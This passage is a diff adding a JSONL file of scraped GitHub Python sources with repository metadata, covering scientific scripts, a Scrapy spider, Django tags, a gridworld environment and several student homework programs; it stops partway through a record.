diff --git "a/3054.jsonl" "b/3054.jsonl" new file mode 100644--- /dev/null +++ "b/3054.jsonl" @@ -0,0 +1,1857 @@ +{"seq_id":"21515613851","text":"import func_lib as f\n\ndef get_file_name(prop, dev):\n return prop + \"_AAD_\" + dev + \"_dev.csv\"\n\nreferences = dict()\n\nfor prop in [\"Pvap\", \"Vsatliq\", \"Vsatvap\"]:\n for dev in [\"abs\", \"rel\"]:\n data_f = open(\"./result/\" + get_file_name(prop, dev), \"r\")\n result_f = open(\"./bycarbon/\" + get_file_name(prop, dev), \"w\")\n for line in data_f.readlines():\n not_processed = True\n while not_processed:\n try:\n # d = deviation\n compound, d, AAD = line.rstrip().split(\",\")\n if not references.get(compound):\n ref_input = input(\"compound: \" + compound + \"\\n\")\n if ref_input == \"\":\n recheck = input(\"Wanna skip? Y/N\" + \"\\n\")\n if recheck == \"Y\":\n references.update({ compound: \"no_ref\" })\n break\n continue\n references.update({ compound: ref_input })\n reference = references.get(compound)\n if reference == \"no_ref\":\n break \n compound_NMR_f = f.get_file(\"./data/\" + compound + \"/NMR_\" + compound + \".csv\")\n compound_NMR = f.get_NMR_arr(compound_NMR_f)\n reference_NMR_f = f.get_file(\"./data/\" + reference + \"/NMR_\" + reference + \".csv\")\n reference_NMR = f.get_NMR_arr(reference_NMR_f)\n print(compound_NMR, \"\\n\", reference_NMR)\n if len(compound_NMR) != len(reference_NMR):\n print(\"REFERENCE INCORRECT: \" + compound + \", \" + reference)\n continue\n carbon1_compound_shift = max(compound_NMR[0], compound_NMR[-1])\n carbon1_reference_shift = reference_NMR[0]\n abs_dev = abs(carbon1_compound_shift - carbon1_reference_shift)\n rel_dev = abs_dev / carbon1_reference_shift\n deviation = abs_dev if dev == \"abs\" else rel_dev\n result_f.write(compound + \",\" + str(deviation) + \",\" + AAD + \"\\n\")\n not_processed = False\n print(\"processed successfully\")\n except:\n not_processed = False\n print(\"unexpected Error\")\n result_f.close()\n data_f.close()","repo_name":"beomseok-kang/ChemEng-MEng-Project-gSAFT-NMRmethod","sub_path":"carbon_1.py","file_name":"carbon_1.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73991365584","text":"import scrapy\n\n\nclass SpecialOffersSpider(scrapy.Spider):\n name = 'special_offers'\n allowed_domains = ['web.archive.org']\n start_urls = ['https://web.archive.org/web/20190225123327/https://www.tinydeal.com/specials.html']\n\n def parse(self, response):\n for product in response.xpath(\"//ul[@class='productlisting-ul']/div/li\"):\n name = product.xpath(\".//a[@class='p_box_title']/text()\").get()\n url = product.xpath(\".//a[@class='p_box_title']/@href\").get()\n discounted_price = product.xpath(\".//span[@class='productSpecialPrice fl']/text()\").get()\n original_price = product.xpath(\".//span[@class='normalprice fl']/text()\").get()\n\n\n\n\n yield{\n 'name': name,\n 'url': url,\n 'discounted price': discounted_price,\n 'original_price': original_price\n }\n\n next = response.xpath(\"//a[@class='nextPage']/@href\").get()\n if (next):\n yield scrapy.Request(url = next, callback = self.parse)\n","repo_name":"derek-shing/scrapy","sub_path":"tinydeal/tinydeal/spiders/special_offers.py","file_name":"special_offers.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5236438485","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom Bio import AlignIO\r\nfrom collections 
import Counter\r\nimport numpy as np\r\n\r\n\r\nfastas = [\"MLA.msa.relative_to_SR33.50.all.fas\",\r\n \"MLA.msa.relative_to_SR33.50.Sr50.fas\",\r\n \"MLA.msa.relative_to_SR33.50.Sr33.fas\",\r\n \"MLA.msa.relative_to_SR33.50.MLA.fas\",\r\n \"MLA.msa.relative_to_SR33.50.HcMLA.fas\"]\r\n\r\noutput = \"test.out\"\r\n\r\nwith open(output, \"w\") as o:\r\n o.write(\"Position\\tEntropy\\tType\\n\") # Header\r\n for item in fastas: #Iterate each group\r\n fasta_handle = AlignIO.read(item, \"fasta\") # read the MSA\r\n group = item.rsplit(\".\", 2)[1] # group name\r\n \r\n seqs = len(fasta_handle[:, 0]) # Number of sequences\r\n cols = fasta_handle.get_alignment_length() # number of positions in MSA\r\n\r\n \r\n for i in range(cols): #Iterate all positions in the MSA\r\n gaps = fasta_handle[:,i].count(\"-\") # count number of gaps\r\n \r\n if gaps/float(seqs) >= 0.5:\r\n # gaps >= 0.5 -> skip entropy calculation. use 2.000 as a place holder\r\n o.write(f\"{str(i + 1)}\\t2.000\\t{group}\\n\")\r\n \r\n else:\r\n # Adjust the number of sequences after removing the gaps\r\n num_seqs = len(fasta_handle[:, i].replace(\"-\", \"\"))\r\n \r\n # Count amino acids \r\n counts = Counter(fasta_handle[:, i].replace(\"-\", \"\"))\r\n \r\n # Convert to the probabilities \r\n Pi = [ct/float(num_seqs) for ct in counts.values()]\r\n \r\n # Calculate normalized entropy \r\n ent = sum([-1 * p * np.log2(p) / np.log2(20) for p in Pi])\r\n \r\n # Write the output\r\n o.write(f\"{str(i + 1)}\\t{str(ent)}\\t{group}\\n\")\r\n\r\n ","repo_name":"krasileva-group/Sr33-Sr50_analysis","sub_path":"Entropy/Compute_entropy.py","file_name":"Compute_entropy.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31309460006","text":"from base_model import BaseModel\nfrom amount import Amount\nfrom payment_method import PaymentMethod\nfrom order import Order\nfrom split_shipment import SplitShipment\nfrom industry_specific_extensions import IndustrySpecificExtensions\nfrom basket_item import BasketItem\nfrom pt_additional_details import AdditionalDetails\nfrom payment_method import PaymentMethod\n\nclass PrimaryTransaction(BaseModel):\n\n\tATTR = [\n\t\t'transaction_type',\n\t\t'store_id',\n\t\t'client_transaction_id',\n\t\t'basket_items'\n\t]\n\n\tOBJ_ATTR = {\n\t\t'amount' : Amount,\n\t\t'payment_method' : PaymentMethod,\n\t\t'order' : Order,\n\t\t'split_shipment' : SplitShipment,\n\t\t'additional_details' : AdditionalDetails,\n\t\t'industry_specific_extensions' : IndustrySpecificExtensions\n\t}\n\n\tdef __init__(self, params):\n\t\tif 'payment_method' not in params:\n\t\t\tself.set_payment_method(params) \n\t\tself.set_attributes(params)\n\t\tif hasattr(self, 'basket_items'):\n\t\t\tself.set_list_items('basket_items', BasketItem)\n\n\tdef set_payment_method(self, params):\n\t\tif 'payment_card' in params:\n\t\t\tparams['payment_method'] = PaymentMethod({'payment_card' : params['payment_card']})\n\t\telif 'sepa_direct_debit' in params:\n\t\t\tparams['payment_method'] = PaymentMethod({'sepa_direct_debit' : params['sepa_direct_debit']})\n\t\telif 'apple_pay' in params:\n\t\t\tparams['payment_method'] = PaymentMethod({'apple_pay' : params['apple_pay']})","repo_name":"ericmargules/firstdata-python","sub_path":"firstdata/models/primary_transaction.py","file_name":"primary_transaction.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"31215013960","text":"from __future__ import print_function\n\n_logging_verbosity = 0\n\n\nclass Logger:\n colors = {\n 'dbg': '\\033[95m',\n 'warn': '\\033[93m\\033[1m',\n 'err': '\\033[91m\\033[1m',\n 'fail': '\\033[41m\\033[30m\\033[1m',\n 'pass': '\\033[42m\\033[30m\\033[1m',\n 'win': '\\033[44m\\033[30m\\033[1m',\n 'wisdom': '\\033[96m\\033[1m',\n 'experience': '\\033[32m\\033[1m',\n 'info': '(i) ',\n 'normal': '\\033[0m'\n }\n\n def __init__(self, verbosity=None):\n if verbosity is not None:\n print(\"Setting verbosity to\", verbosity)\n global _logging_verbosity\n _logging_verbosity = verbosity\n\n def log(self, importance, text):\n global _logging_verbosity\n if importance == 'dbg' and _logging_verbosity < 1:\n return # Don't print debug logs if the code verbosity is low.\n if importance not in self.colors.keys():\n # If the color doesn't exist\n print('error: bad importance %s' % [importance])\n try:\n # Try to write the selected color\n print(self.colors[importance], end='')\n except KeyError as e:\n # If the color doesn't exist, write the error.\n print(e)\n if text.__class__ is tuple:\n # If the text is a tuple:\n print(' '.join([str(x) for x in text])\n .replace('\\\\n', '\\n'), end='')\n else:\n # If the text isn't a tuple, just write it.\n print(text, end=\"\")\n print(self.colors['normal'])\n\n def line(self):\n # Print a newline.\n print()\n","repo_name":"koans-for-pebble/koans-for-pebble","sub_path":"koan_lib/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42043528258","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 1 14:06:34 2019\n\n@author: dieter\n\"\"\"\n\n\n\n\nimport numpy\nimport pandas\n\ndata = pandas.read_csv('PoliceForce.csv', parse_dates=['INCIDENT_DATE'])\n\ndates = data['INCIDENT_DATE']\nyear = dates.dt.year\ndata['year'] = year\n\ngrp = data.groupby(['OFFICER_GENDER', 'SUBJECT_GENDER'])\ncnt = grp.DISTRICT.count()\ncnt = cnt.reset_index()\n\ntotal = len(data)\ngender_officers = data.OFFICER_GENDER.value_counts() / total\ngender_subjects = data.SUBJECT_GENDER.value_counts() / total\np = numpy.outer(gender_officers.values, gender_subjects.values) * total\n\n# officer_subject\nm_m = p[0, 0]\nf_m = p[1, 0]\no_m = p[2, 0]\n\nm_f = p[0, 1]\nf_f = p[1, 1]\no_f = p[2, 1]\n\nm_o = p[0, 2]\nf_o = p[1, 2]\no_o = p[2, 2]\n\nnorm = [f_f, f_m, f_o, m_f, m_m, m_o, o_f, o_m]\n\ncnt['norm'] = norm\n\ncnt['ratio'] = cnt['DISTRICT'] / cnt['norm']\n\ntable = cnt.pivot(index='OFFICER_GENDER', columns='SUBJECT_GENDER', values='ratio')\ntable = table.iloc[0:2, 0:2]\n\nprint(table)\n\n#%%\nfrom matplotlib import pyplot\n\nfor x in data.columns: print(x)\n\ngrp = data.groupby('DISTRICT')\ncnt = grp.count()\n\ncnt = cnt.reset_index()\ncnt = cnt.sort_values(by='INCIDENT_NO', ascending=False)\n\npyplot.figure(figsize=(12,10))\npyplot.bar(range(15), cnt['INCIDENT_NO'])\npyplot.xticks(range(15), cnt['DISTRICT'], rotation=90)\n\npyplot.show()\n\n##\ndistrict1 = data.query('DISTRICT == \"DISTRICT 1\"')\ngrp = data.groupby('INCIDENT_TYPE')\ncnt = grp.count()\ncnt = cnt.reset_index()\n\nnr = cnt['INCIDENT_NO']\nsm = nr.sum()\n\nnr = nr/sm\n#%%\n\nexplode = nr.size * [0]\nexplode[5] = 0.25\n\npyplot.figure(figsize=(6,3))\npyplot.subplot(1,2,1)\npatches, texts = pyplot.pie(nr, explode=explode)\npyplot.subplot(1,2,2)\npyplot.box(False)\npyplot.axis('off')\npyplot.legend(patches, 
['asssssssssssssssssssssssssss','b','c','d','e','f'], loc=\"right\")\npyplot.show()\n\n#%%","repo_name":"dvanderelst/GradStats","sub_path":"DataScenarios/scenario_PoliceForce/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15421122957","text":"import glob\nimport os\n\nfrom cffi import FFI\n\n\ninclude_dirs = [os.path.join('libraries', 'Rmath', 'src'),\n os.path.join('libraries', 'Rmath', 'include')]\n\nrmath_src = glob.glob(os.path.join('libraries', 'Rmath', 'src', '*.c'))\n\n# Take out dSFMT dependant files\nrmath_src = [f for f in rmath_src if 'librandom.c' not in f]\nrmath_src = [f for f in rmath_src if 'randmtzig.c' not in f]\n\nextra_compile_args = ['-DMATHLIB_STANDALONE', '-std=c99']\n\nffi = FFI()\nffi.set_source('_rmath_ffi', '#include ',\n include_dirs=include_dirs,\n sources=rmath_src,\n libraries=[],\n extra_compile_args=extra_compile_args)\n\nffi.cdef('''\\\ndouble pnorm(double, double, double, int, int);\ndouble qnorm(double, double, double, int, int);\ndouble runif(double, double);\nvoid set_seed(unsigned int, unsigned int);\n''')\n\nif __name__ == '__main__':\n ffi.compile(verbose=True)\n","repo_name":"synapticarbors/numba_cffi_bug","sub_path":"build_rmath.py","file_name":"build_rmath.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6351362854","text":"from django import template\nfrom django.conf import settings\n\nfrom kubeportal.k8s import kubernetes_api as api\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef apiserver():\n return api.get_apiserver()\n\n\n@register.simple_tag\ndef settings_value(name):\n return getattr(settings, name, \"\")\n\n\n@register.simple_tag\ndef settings_value_normalized(name):\n val = getattr(settings, name, \"\")\n return val.lower().replace(' ', '_')\n\n\n@register.simple_tag(takes_context=True)\ndef placeholder_replace(context, text):\n if text is None:\n return \"\"\n\n try:\n ns = context.request.user.service_account.namespace.name\n svc = context.request.user.service_account.name\n except:\n ns = \"\"\n svc = \"\"\n with_ns = text.replace(\"{{namespace}}\", ns)\n with_both = with_ns.replace(\"{{serviceaccount}}\", svc)\n return with_both\n","repo_name":"kubeportal/kubeportal","sub_path":"kubeportal/templatetags/frontend_tags.py","file_name":"frontend_tags.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"70900923666","text":"from typing import Optional\n\nimport numpy.random as rnd\n\nfrom gym_gridverse.action import Action\nfrom gym_gridverse.agent import Agent\nfrom gym_gridverse.design import draw_room, draw_wall_boundary\nfrom gym_gridverse.envs.reset_functions import reset_function_registry\nfrom gym_gridverse.envs.reward_functions import reward_function_registry\nfrom gym_gridverse.envs.terminating_functions import (\n terminating_function_registry,\n)\nfrom gym_gridverse.envs.transition_functions import transition_function_registry\nfrom gym_gridverse.geometry import Area, Orientation\nfrom gym_gridverse.grid import Grid\nfrom gym_gridverse.grid_object import Color, Floor, GridObject, Wall\nfrom gym_gridverse.rng import choice, get_gv_rng_if_none\nfrom gym_gridverse.state import State\n\n\nclass Coin(GridObject):\n state_index = 0\n color = Color.NONE\n blocks_movement = 
False\n blocks_vision = False\n holdable = False\n\n @classmethod\n def can_be_represented_in_state(cls) -> bool:\n return True\n\n @classmethod\n def num_states(cls) -> int:\n return 1\n\n def __repr__(self):\n return f'{self.__class__.__name__}()'\n\n\n@reset_function_registry.register\ndef coin_maze(*, rng: Optional[rnd.Generator] = None) -> State:\n \"\"\"creates a maze with collectible coins\"\"\"\n\n # must call this to include reproduceable stochasticity\n rng = get_gv_rng_if_none(rng)\n\n # initializes grid with Coin\n grid = Grid.from_shape((7, 9), factory=Coin)\n # assigns Wall to the border\n draw_wall_boundary(grid)\n # draw other walls\n draw_room(grid, Area((2, 4), (2, 6)), Wall)\n # re-assign openings\n grid[2, 3] = Coin()\n grid[4, 5] = Coin()\n\n # final result (#=Wall, .=Coin):\n\n # #########\n # #.......#\n # #.W.WWW.#\n # #.W...W.#\n # #.WWW.W.#\n # #.......#\n # #########\n\n # randomized agent position and orientation\n agent_position = choice(\n rng,\n [\n position\n for position in grid.area.positions()\n if isinstance(grid[position], Coin)\n ],\n )\n agent_orientation = choice(rng, list(Orientation))\n agent = Agent(agent_position, agent_orientation)\n\n # remove coin from agent initial position\n grid[agent.position] = Floor()\n\n return State(grid, agent)\n\n\n@transition_function_registry.register\ndef collect_coin_transition(\n state: State,\n action: Action,\n *,\n rng: Optional[rnd.Generator] = None,\n):\n \"\"\"collects and removes coins\"\"\"\n if isinstance(state.grid[state.agent.position], Coin):\n state.grid[state.agent.position] = Floor()\n\n\n@reward_function_registry.register\ndef collect_coin_reward(\n state: State,\n action: Action,\n next_state: State,\n *,\n reward: float = 1.0,\n rng: Optional[rnd.Generator] = None,\n):\n \"\"\"gives reward if a coin was collected\"\"\"\n return (\n reward\n if isinstance(state.grid[next_state.agent.position], Coin)\n else 0.0\n )\n\n\n@terminating_function_registry.register\ndef no_more_coins(\n state: State,\n action: Action,\n next_state: State,\n *,\n rng: Optional[rnd.Generator] = None,\n):\n \"\"\"terminates episodes if all coins are collected\"\"\"\n return not any(\n isinstance(next_state.grid[position], Coin)\n for position in next_state.grid.area.positions()\n )\n","repo_name":"abaisero/gym-gridverse","sub_path":"examples/coin_env.py","file_name":"coin_env.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"36369817984","text":"############################################################\r\n# Name: Jonathan Carbonneau\r\n# CS115 HW#\r\n# \r\n# Pledge: I pledge my honor that i have abbided by the stevens honor system\r\n############################################################\r\n\r\nimport random\r\n# change finds the least amount of coins to make a money ammount\r\ndef change(amount, coins):\r\n coins.sort(reverse=True) #sorts em big to small\r\n n = len(coins)\r\n maxbound = coins[n - 1] * amount + 1# this is the deapest it shold serch\r\n best = maxbound\r\n\r\n def depthFirstSearch(index, total, level):\r\n nonlocal best\r\n if total == amount:\r\n best = min(best, level)\r\n return\r\n for i in range(index, n):# creats 3 new nodes\r\n coin = coins[i]\r\n if coin <= amount - total < coin * (best - level):#stops if it is deaper best depth\r\n depthFirstSearch(i, total + coin, level + 1)\r\n depthFirstSearch(0, 0, 0)\r\n if best != maxbound:\r\n return best\r\n return 
-1\r\n#print(change(313,[7,24,42]))\r\n\r\n\r\n#currency will produce a number long list of random numbers less than 10\r\ndef currency(number):\r\n #genarates a list with random numbers\r\n listgen = lambda x: listgen(x-1) + [random.randrange(10)] if x > 1 else [random.randrange(10)]\r\n #removes dupicates and adds random numbers till it gets to number long\r\n filterRandomList = lambda randomList: filterRandomList(list(set(randomList)) + [random.randrange(10)]) if len(randomList) > len(set(randomList)) or len(set(randomList)) != number else randomList\r\n return filterRandomList(listgen(number))\r\n\r\n#print(currency(4))\r\n\r\n","repo_name":"JonathanCarbonneau/Least-Amount-Of-Coins","sub_path":"hw4.py","file_name":"hw4.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10532478270","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.forms import UserChangeForm\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django_ai.supervised_learning.admin import \\\n HGBTreeClassifierAdmin, SVCAdmin\n\nfrom .models import (\n CurrentClassifier, DecisionTree, ExternalClassifier, NetworkErrorLog,\n NetworkNode, SVM, User, )\n\n\nclass CovidHTUserChangeForm(UserChangeForm):\n\n class Meta(UserChangeForm.Meta):\n model = User\n\n\nclass CovidHTUserAdmin(UserAdmin):\n\n form = CovidHTUserChangeForm\n list_display = (\n 'unit',\n 'user_type', 'username', 'email', 'name',\n 'is_active', 'date_joined', 'is_staff'\n )\n list_display_links = ('username', )\n list_filter = (\n 'unit',\n 'user_type', ) + UserAdmin.list_filter\n fieldsets = (\n (None, {'fields': (\n 'unit',\n 'user_type',)}),\n ) + UserAdmin.fieldsets\n\n\nadmin.site.register(User, CovidHTUserAdmin)\n\n\n@admin.register(CurrentClassifier)\nclass CurrentClassifierAdmin(admin.ModelAdmin):\n\n fieldsets = (\n (_(\"Local Classifier\"), {\n 'fields': (\n ('classifier', 'external'),\n ),\n }),\n (_(\"Network Voting\"), {\n 'fields': (\n ('network_voting', ),\n ('breaking_ties_policy',),\n ('network_voting_threshold',),\n ),\n }),\n )\n\n def change_view(self, request, object_id, form_url='', extra_context=None):\n extra_context = extra_context or {}\n extra_context[\"nodes\"] = NetworkNode.objects.all()\n return super().change_view(\n request, object_id, form_url, extra_context=extra_context\n )\n\n\n@admin.register(ExternalClassifier)\nclass ExternalClassifierAdmin(admin.ModelAdmin):\n fieldsets = (\n (_(\"General\"), {\n 'fields': (\n ('name', ),\n ('service_url', ),\n ),\n }),\n (_(\"Users\"), {\n 'fields': (\n ('remote_user', 'remote_user_token'),\n ),\n }),\n (_(\"Classification Service\"), {\n 'fields': (\n ('metrics',),\n ),\n }),\n (_(\"Timeout\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('timeout',),\n ),\n }),\n (_(\"Endpoints\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('endpoint_classify', 'endpoint_classify_dataset'),\n ),\n }),\n (_(\"Other\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('metadata',),\n ),\n }),\n )\n readonly_fields = ['metadata', ]\n\n\n@admin.register(DecisionTree)\nclass DecisionTreeAdmin(HGBTreeClassifierAdmin):\n pass\n\n\n@admin.register(SVM)\nclass SVMAdmin(SVCAdmin):\n pass\n\n\n@admin.register(NetworkNode)\nclass NetworkNodeAdmin(admin.ModelAdmin):\n fieldsets = (\n (_(\"General\"), {\n 'fields': (\n ('name', ),\n ('service_url', ),\n ),\n }),\n (_(\"Users\"), {\n 'fields': (\n ('unit', 'user',),\n ('remote_user', 
'remote_user_token'),\n ),\n }),\n (_(\"Data Sharing\"), {\n 'fields': (\n ('data_sharing_is_enabled',),\n ('data_sharing_mode',),\n ),\n }),\n (_(\"Classification Service\"), {\n 'fields': (\n ('classification_request', ),\n ('metrics',),\n ),\n }),\n (_(\"Timeout\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('timeout',),\n ),\n }),\n (_(\"Endpoints\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('endpoint_data',),\n ('endpoint_classify', 'endpoint_classify_dataset'),\n ),\n }),\n (_(\"Other\"), {\n 'classes': ('collapse',),\n 'fields': (\n ('metadata',),\n ),\n }),\n )\n readonly_fields = ['metadata', ]\n\n\n@admin.register(NetworkErrorLog)\nclass NetworkErrorLogAdmin(admin.ModelAdmin):\n pass\n","repo_name":"math-a3k/covid-ht","sub_path":"base/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4089678102","text":"print(\"Hello \", end=\"\")\nprint(\"World!\")\nprint(\"Cat\", \"Dog\", 'Mice', sep= \",\")\nAge = 0\nstuff = 0\ndef Brian_Function():\n global Age\n if inputs == \"brian\":\n Age = Age + 1\n print(\"Brian Count: \"+str(Age))\n else:\n print(\"Not Brian\")\ndef Chloe_Function():\n print(inputs)\n if inputs == \"chloe\":\n Age = Age + 1\n print(\"Chloe Count: \"+str(Age))\n else:\n print(\"Not Chloe\")\n\ndef main():\n print(\"VOTE BRIAN FOR PRESIDENT! CHLOE SHMOE!!! Actually, I couldn't find any rhymes for Chloe Stinks.\")\n print(\"VOTE CHLOE FOR PRESIDENT! BRIAN IS LYIN!!!! Actually, I couldn't find any rhymes for Brian Stinks.\")\n\n while stuff == 0:\n inputs = input(\"Print Brian, the handsome knight, or Chloe, the dog: \")\n inputs = inputs.lower()\n if inputs == \"brian\":\n Brian_Function()\n if inputs == \"chloe\":\n Chloe_Function()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"briangao892/Brian2022SummerPythonCode","sub_path":"print.py","file_name":"print.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34588010483","text":"from dotenv import load_dotenv\nfrom os import getenv\nfrom datetime import datetime\nfrom django.core.cache import cache\nimport praw\n# import pprint\n\n\ndef get_messages(count=16):\n \"\"\"\n Get specified messages from the reddit\n :param count: The total amount of messages to get\n :type amount: int\n \"\"\"\n\n load_dotenv()\n\n reddit = praw.Reddit(\n client_id=getenv(\"REDDIT_CLIENT_ID\"),\n client_secret=getenv(\"REDDIT_CLIENT_SECRET\"),\n refresh_token=getenv(\"REDDIT_REFRESH_TOKEN\"),\n user_agent=getenv(\"REDDIT_USER_AGENT\"),\n )\n\n result = []\n\n subreddit: praw.reddit.Subreddit = reddit.subreddit(\"transplace\")\n for submission in subreddit.new(limit=count):\n # In case I ever need to figure out\n # all the properties a submission has\n # pprint.pprint(vars(submission))\n\n if submission.archived:\n print(submission.title, \"ARCHIVED\")\n continue\n\n data = {\n \"id\": submission.id,\n \"title\": submission.title,\n \"content\": None,\n \"message_type\": \"User Content\",\n \"reddit_url\": submission.shortlink,\n \"created_at\": datetime.utcfromtimestamp(submission.created_utc)\n }\n\n # If the post is an image post\n # We have to do it this way bc PRAW does funny stuff\n try:\n\n if submission.preview[\"enabled\"]:\n data[\"file_url\"] = submission.url\n\n if \"video\" in submission.post_hint:\n data[\"file_url\"] = 
submission.preview[\"images\"][0][\"resolutions\"][-1][\"url\"]\n\n except BaseException as e:\n pass\n\n result.append(data)\n\n # 🙏\n cache.set(\"posts\", result)\n\n # For convenience\n return result\n\n# get_messages()\n","repo_name":"SqueakyBeaver/TransPlace-Site","sub_path":"reddit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42198461641","text":"from gene_models import model_processed\nfrom postprocessor_trim import PostprocessorTrim \n\nDATA_SURVIVORS_PATH = '../data/processed/survivors'\nDATA_DECEASED_PATH = '../data/processed/deceased'\n\nDESTINATION_SURVIVORS_PATH = '../data/trimmed/survivors'\nDESTINATION_DECEASED_PATH = '../data/trimmed/deceased'\n\nmodel_type = model_processed\ndeceased_cutoff = 50. # 17. # smaller sample--less variation close to the median\nsurvivors_cutoff = 50. # 50. \n\nexpression_count_floor = 300\n\nsurvivors_processor = PostprocessorTrim(model_type, DATA_SURVIVORS_PATH, DESTINATION_SURVIVORS_PATH, survivors_cutoff, expression_count_floor)\ndeceased_processor = PostprocessorTrim(model_type, DATA_DECEASED_PATH, DESTINATION_DECEASED_PATH, deceased_cutoff, expression_count_floor)\n\ndeceased_processor.trim_outliers()\nsurvivors_processor.trim_outliers()\n\n\n\n","repo_name":"rcoppy/oncogene-analysis","sub_path":"preprocessing/trimming.py","file_name":"trimming.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12263493351","text":"'''\r\nCreated on Sep 1, 2019\r\n\r\n@author: Ricardo Sanchez\r\n'''\r\nimport sys # command line arguments\r\nimport os # checking if file exists\r\n \r\n#Checking initial conditions (Samples taken from wordCountTest) \r\nif len(sys.argv) is not 3:\r\n print(\"Correct usage: wordCount.py \")\r\n exit()\r\n\r\ninputFname = sys.argv[1]\r\noutputFname = sys.argv[2]\r\n\r\n#make sure input file exist\r\nif not os.path.exists(inputFname):\r\n print (\"text file input %s doesn't exist! Exiting\" % inputFname)\r\n exit()\r\n \r\n#make sure output file exists\r\nif not os.path.exists(outputFname):\r\n print (\"wordCount output file %s doesn't exist! 
Exiting\" % outputFname)\r\n exit()\r\n\r\n\r\n#open file and create initial list of words\r\nopen_file = open(inputFname, \"r\")\r\nstri= \"\"\r\n\r\nfor line in open_file:\r\n stri+=line \r\nword_stri = stri.split()\r\nopen_file.close()\r\n\r\n\r\n#punctuation and sorting of words\r\ncount = 0\r\nwhile count < len(word_stri):\r\n if \",\" in word_stri[count] or \".\" in word_stri[count] or \":\" in word_stri[count] or \";\" in word_stri[count]:\r\n word_stri[count] = word_stri[count].translate({ord(i): None for i in ',.:;'})\r\n if \"--\" in word_stri[count]:\r\n word_stri[count] = word_stri[count].replace('--', '-')\r\n if \"-\" in word_stri[count]:\r\n word_stri.append(word_stri[count].split('-')[1])\r\n word_stri[count] = word_stri[count].split('-')[0]\r\n word_stri[count] = word_stri[count].lower()\r\n count += 1\r\nword_stri.sort()\r\n\r\n#count of words\r\nnewList =[]\r\nindex = 0\r\ncurCount = 0\r\ntempString =\"\"\r\nwhile index < len(word_stri):\r\n curCount = word_stri.count(word_stri[index])\r\n tempString = word_stri[index] + \" \" + str(curCount)\r\n newList.append(tempString) \r\n index += curCount\r\n \r\n#writing output file\r\nwith open(outputFname, 'w') as f:\r\n for item in newList:\r\n f.write(\"%s\\n\" % item)\r\n","repo_name":"os-utep-master/python-intro-rasanchez7","sub_path":"wordCount.py","file_name":"wordCount.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"852448717","text":"import json\r\n\r\nclass Employee:\r\n def __init__(self,eno,ename,esal,eaddr):\r\n self.eno = eno\r\n self.ename = ename\r\n self.esal= esal\r\n self.eaddr = eaddr\r\n def display(self):\r\n print('E-NO:{},E-NAME:{},E-SAL:{},E-ADDR:{}'.format(self.eno,self.ename,\r\n self.esal,self.eaddr))\r\n","repo_name":"harishramuk/python-handson-exercises","sub_path":"empobject406.py","file_name":"empobject406.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17245857556","text":"\r\nfrom re import X\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nclass ProjectileDrop():\r\n def __init__(self, h, v_x):\r\n self.h0 = h\r\n self.v_x = v_x\r\n print('Objekt uspješno stvoren. 
